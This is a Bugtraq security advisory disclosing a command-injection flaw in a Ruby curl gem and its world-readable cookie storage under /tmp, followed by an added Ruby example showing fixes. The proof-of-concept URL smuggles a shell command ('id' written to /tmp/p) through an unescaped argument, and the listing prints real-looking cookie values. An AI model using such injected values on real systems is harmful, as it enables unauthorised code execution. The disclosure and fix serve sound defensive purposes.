Message-Id: <201303151409.r2FE9SYh006476@sf01web2.securityfocus.com>
Date: Fri, 15 Mar 2013 14:09:28 GMT
From: Larry0@...com
To: bugtraq@...urityfocus.com
Subject: Curl Ruby Gem Remote command execution
Curl Ruby Gem Remote command execution
3/12/2013
https://github.com/tg0/curl
Specially crafted URLs can result in remote code execution:
In ./lib/curl.rb the following lines:
# lib/curl.rb, lines 131-135: the caller-supplied URL is interpolated unescaped
# into a command string that is then handed to a shell via open_pipe.
cmd = "curl #{cookies_store} #{browser_type} #{@...up_params} #{ref} \"#{url}\" "
if @debug
  puts cmd.red
end
result = open_pipe(cmd)
PoC
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")
larry@...erfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)
Larry W. Cashdollar
@_larry0
http://vapid.dhs.org
This gem also stores cookie data insecurely in /tmp:
root@...erfl0w:/tmp# ls -ld curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 curl
root@...erfl0w:/tmp# ls -ld /tmp/curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 /tmp/curl
root@...erfl0w:/tmp# ls -la curl/curl_0.*
-rw-r--r-- 1 root root 428 Mar 12 18:44 curl/curl_0.287351232063069_0.217269869500322.jar
-rw-r--r-- 1 root root 428 Mar 12 18:25 curl/curl_0.564885403765839_0.0415036222928075.jar
root@...erfl0w:/tmp# cat /tmp/curl/curl_0.*
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
.google.com TRUE / FALSE 1426199640 PREF ID=c637a1a53176d2bd:FF=0:TM=1363127640:LM=1363127640:S=XG_kBQswSvKUKY5m
#HttpOnly_.google.com TRUE / FALSE 1378938840 NID 67=kOUx2FhV6OQ6MSybmqD5vZMSI3gH8jB22AC4ReeIoqZHbao8zkejJncER8YznFgSVes6_MfqBJpgyPdR1snw3POtLL1Nr96RsQqHcdv6v6rkSmj_Z2XmVakZ95Rt1wMC
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
.google.com TRUE / FALSE 1426198990 PREF ID=ca381d47b3f5aec2:FF=0:TM=1363126990:LM=1363126990:S=HrBfHkxDYMih4kfC
#HttpOnly_.google.com TRUE / FALSE 1378938190 NID 67=ozR4v4tBjG9kUmFshdYLu7h0Z_fyXBpTrABHtlJYbEpkB1czXMKEGa_S5t3rMBbunYIeEaguy3l1fOkfWqFni_ajjxipoyNK4taRefp977i7yV_xc4GIEtP-OQuRCydF
root@...erfl0w:/tmp#
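An added example, not the gem's own code and not part of the advisory, showing the two fixes a maintainer would want for the issues above: the curl command built as an argument vector so the URL is never parsed by a shell, and the cookie jar created as a private mode-0600 file instead of a predictable world-readable path under /tmp/curl. The function names, the curl option set and the sample URL are assumptions.

```ruby
require 'open3'
require 'uri'
require 'tmpdir'
require 'fileutils'

SAFE_SCHEMES = %w[http https].freeze

# Validate the URL and return the argv array for curl. The array goes straight
# to execve (no shell), so ; " ` $ ( ) in the URL are URL bytes, not separators.
def curl_argv(url, cookie_jar, browser_type: 'Mozilla/5.0')
  begin
    uri = URI.parse(url)
  rescue URI::InvalidURIError
    raise ArgumentError, "malformed URL: #{url.inspect}"
  end
  unless SAFE_SCHEMES.include?(uri.scheme) && !uri.host.to_s.empty?
    raise ArgumentError, "refusing non-http(s) URL: #{url.inspect}"
  end
  # '--' ends option parsing, so a URL starting with '-' cannot add curl flags
  ['curl', '-s', '-A', browser_type, '-c', cookie_jar, '-b', cookie_jar, '--', uri.to_s]
end

# Create the cookie jar inside a fresh mode-0700 directory with the file at
# 0600 (O_EXCL, so a pre-planted file or symlink at that path is refused),
# instead of a predictable world-readable path under /tmp/curl.
def private_cookie_jar(base = Dir.tmpdir)
  dir = Dir.mktmpdir('curl-cookies-', base)
  path = File.join(dir, 'cookies.txt')
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0600) {}
  path
end

# Run curl without a shell; returns [body, exit status].
def fetch(url, cookie_jar = private_cookie_jar)
  out, status = Open3.capture2(*curl_argv(url, cookie_jar))
  [out, status.exitstatus]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: shell metacharacters stay inside a single argv element
  p curl_argv('http://example.com/;id;$(id)', '/tmp/demo-cookies.txt')
end
```

The `fetch` helper requires a curl binary on PATH; `curl_argv` and `private_cookie_jar` can be exercised without it.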